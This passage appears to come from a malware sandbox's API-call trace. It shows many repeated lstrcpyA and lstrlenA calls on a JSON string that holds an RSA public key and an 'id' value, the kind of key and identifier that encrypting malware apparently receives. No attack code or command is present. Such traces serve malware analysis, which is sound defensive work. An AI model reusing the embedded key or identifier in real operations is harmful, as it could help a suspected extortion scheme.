KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0177.850] lstrcpyA (in: lpString1=0x8cca778, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0177.850] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.850] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.850] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.850] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.850] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.850] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.850] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.850] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.850] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.850] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.850] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.850] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.850] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.850] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.850] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.850] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.850] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.850] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.851] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.851] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.851] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.851] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.851] lstrlenA (lpString="-----BEGIN PUBLIC 